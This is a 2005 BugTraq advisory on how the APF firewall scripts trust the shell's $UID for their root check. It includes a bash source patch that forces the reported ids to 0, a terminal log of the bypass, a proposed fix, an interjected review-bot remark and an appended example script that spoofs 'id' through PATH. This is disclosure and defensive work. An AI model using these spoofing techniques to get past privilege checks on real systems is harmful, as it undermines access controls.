BugTraq
SB2005002: pron to bypass APF checking uid(0) routine Jan 13 2005 04:32AM
x90c (jyj9782 kornet net)


=====================================================

SB2005002: pron to bypass APF checking uid(0) routine

-----------------------------------------------------

Date : 01-13-2005

Author : x90c (at) www.chollian (dot) net [email concealed]/~jyj9782

----- Affected Version -----

apf-0.9.4-7 ( current at this time )

----- Summary -----

APF is a policy-based iptables firewall system designed for ease of use and
configuration. It employs a subset of features to satisfy the veteran Linux
user and the novice alike. Packaged in tar.gz and RPM formats, APF is ideal
for deployment in any Linux server environment.

Tarball from the website ( http://www.r-fx.org/apf.php ).

1) The flaw

The apf and firewall scripts decide whether they are running as root by
testing the shell variable $UID against "0". That value is supplied by the
shell, not by the kernel. A local user who runs the scripts under a modified
bash that reports UID 0 therefore gets past the check and reaches the
administrative logic (loading or changing rules, starting and stopping the
firewall daemon). Whether the iptables commands that follow then succeed is
decided by the kernel, which still sees the real uid; in the PoC below the
output of id stays at uid=1001 throughout.

Small things like this are where real problems start. In practice, though,
the bypass is unlikely to be reachable: install.sh runs
"chmod 750 $INSPATH/firewall", so an unprivileged user cannot execute the
installed script at all. This note is about the weak pattern and its
potential, not a working privilege escalation.

----- PoC -----

STEP 1) Patch the bash source (shell.c, around line 1099, in uidget()) so
that the shell reports uid and gid 0 whatever the kernel says:

+ u = 0;

+ current_user.gid = 0;

+ current_user.euid = 0;

+ current_user.egid = 0;
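Review bot: the hunk shows only the four added lines and none of the lines they replace, so it cannot be applied as a patch; include the `-` lines for the real-uid and real-gid lookups that `u = 0;` and the three `current_user.* = 0;` assignments stand in for, or say plainly that the full uidget() listed below is the intended result. Also, with uid, gid, euid and egid all forced to 0 the function's return value, `(current_user.uid != current_user.euid) || (current_user.gid != current_user.egid)`, is always 0, so the patched bash also stops noticing when it runs setuid or setgid; worth stating, since it is a side effect rather than the goal.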

shell.c, uidget() after the patch (the four lines above replace the calls
that normally fetch the real and effective ids from the kernel):

    static int
    uidget ()
    {
      uid_t u;

      u = 0;                        /* patched: was the real uid lookup */
      if (current_user.uid != u)
        {
          FREE (current_user.user_name);
          FREE (current_user.shell);
          FREE (current_user.home_dir);
          current_user.user_name = current_user.shell = current_user.home_dir = (char *)NULL;
        }
      current_user.uid = u;
      current_user.gid = 0;         /* patched: gid forced to 0 */
      current_user.euid = 0;        /* patched: euid forced to 0 */
      current_user.egid = 0;        /* patched: egid forced to 0 */

      /* See whether or not we are running setuid or setgid.
         With every field forced to 0 this is now always 0. */
      return (current_user.uid != current_user.euid) ||
             (current_user.gid != current_user.egid);
    }

STEP 2) Run the scripts that are meant for root (uid 0) only under the patched bash.

    root@testbed:/home/s/apf-0.9.4-7# ls
    CHANGELOG    README          apf.init    files       logrotate.d.apf
    COPYING.GPL  README.antidos  cron.daily  install.sh
    root@testbed:/home/s/apf-0.9.4-7# cd files
    root@testbed:/home/s/apf-0.9.4-7/files# ls
    VERSION            apf        deny_hosts.rules  extras     log.rules       sysctl.rules
    ad                 bt.rules   doc               firewall   main.rules      vnet
    allow_hosts.rules  conf.apf   ds_hosts.rules    internals  preroute.rules
    root@testbed:/home/s/apf-0.9.4-7/files# grep "UID" *
    apf:if [ "$UID" != "0" ]; then
    firewall:if [ "$UID" != "0" ]; then
    root@testbed:/home/s/apf-0.9.4-7/files#

I did not want to install it, so I only tested as below.

    root@testbed:/tmp# ls -al b* f*
    -rwxr-xr-x  1 pt   pt   2969870 2005-01-08 01:23 bash90
    -rwxrwxr-x  1 root root      24 2005-01-08 01:23 fake_firewall
    root@testbed:/tmp# su pt
    pt@testbed:/tmp$ id
    uid=1001(pt) gid=1001(pt) groups=1001(pt),101(wheel)
    pt@testbed:/tmp$ echo $UID
    1001
    pt@testbed:/tmp$ ./bash90
    root@testbed:/tmp# echo $UID
    0
    root@testbed:/tmp# id
    uid=1001(pt) gid=1001(pt) groups=1001(pt),101(wheel)
    root@testbed:/tmp# ./fake_firewall
    1001
    root@testbed:/tmp# exit
    exit
    pt@testbed:/tmp$ ./bash90 fake_firewall
    0
    pt@testbed:/tmp$

----- Solution -----

# cp /bin/id /firewall_path/secure_id
# chmod 700 /firewall_path/secure_id

Then change the scripts to obtain the uid from that file instead of from
$UID. Because the copy is root-owned and mode 0700, a non-root caller cannot
execute it at all, so the check fails closed instead of being talked into
"0" by a shell variable or by an id found on the caller's PATH. Note the
limit of any such fix: a check evaluated inside the invoker's own process
can always be subverted by the invoker (the patched bash is exactly that),
so the permissions install.sh sets (chmod 750) and the kernel's own refusal
of the privileged iptables calls are what actually hold.

Alternatively, upgrade to a newer release.
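The two checks discussed on this page, the `$UID` test that the grep found in apf and firewall and the root-only secure_id copy proposed as the fix, side by side as an added example. This is not code from APF or from the advisory; the function names, the fake `id` script and the temporary directory are the example's own, and the hostile-PATH scenario is constructed here as the PATH equivalent of the patched bash that reports UID 0.

```shell
#!/bin/sh
# Added example, not APF's or the advisory's code.  Shows why a root check
# that lives inside the caller's own process (a shell variable, or a program
# looked up through the caller's PATH) is advisory only, and what pinning
# the id binary by absolute path (the secure_id idea) does and does not fix.
#
# Constructed scenario: an unprivileged caller prepends a directory holding
# a fake `id` that always prints 0.  Names below are this example's own.

# What the shell itself claims; APF's scripts compare this with "0".
# Under a shell that does not set UID (dash, for one) it is simply empty.
shell_uid_claim() {
    printf '%s\n' "${UID:-unset}"
}

# The check exactly as APF's apf and firewall scripts spell it.
apf_style_check() {
    if [ "${UID:-}" != "0" ]; then
        return 1   # "must be root"
    fi
    return 0
}

# Same intent, but asking whatever `id` the caller's PATH resolves to.
path_id_uid() {
    id -u
}

# Pin the binary by absolute path, resolved before any PATH tampering.
# This is the advisory's /firewall_path/secure_id idea; with mode 0700 and
# root ownership a non-root caller cannot run it at all, so the check
# fails closed rather than being fooled.
REAL_ID=$(command -v id)
pinned_id_uid() {
    "$REAL_ID" -u
}

# Run both lookups with a hostile directory in front of PATH.  Prints two
# fields: the uid the PATH lookup reports, then the uid the pinned binary
# reports.  The fake `id` is constructed here, not taken from any system.
demo_hostile_path() {
    tmp=$(mktemp -d) || return 1
    printf '#!/bin/sh\necho 0\n' > "$tmp/id"
    chmod 755 "$tmp/id"
    fooled=$(PATH="$tmp:$PATH" sh -c 'id -u')
    honest=$(PATH="$tmp:$PATH" sh -c "'$REAL_ID' -u")
    rm -rf "$tmp"
    printf '%s %s\n' "$fooled" "$honest"
}

# Stand-alone run: compare the three views of "who am I".
main() {
    echo "shell \$UID claim : $(shell_uid_claim)"
    echo "id on PATH       : $(path_id_uid)"
    echo "pinned id        : $(pinned_id_uid)"
    set -- $(demo_hostile_path)
    echo "hostile PATH     : lookup says $1, pinned binary says $2"
}

main
```

Run it as an ordinary user: the hostile-PATH line shows the PATH lookup reporting 0 while the pinned binary still reports the real uid, the same split the PoC shows between `echo $UID` (0) and `id` (uid=1001). What no variant fixes is a modified interpreter, since the check then runs inside the attacker's own program; the controls that actually hold are the root-owned mode 0750 that install.sh sets and the kernel's refusal of the iptables calls for a caller without CAP_NET_ADMIN.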

----- Credits -----

This flaw was found by x90c (Kyong Joo, Jung) personally.
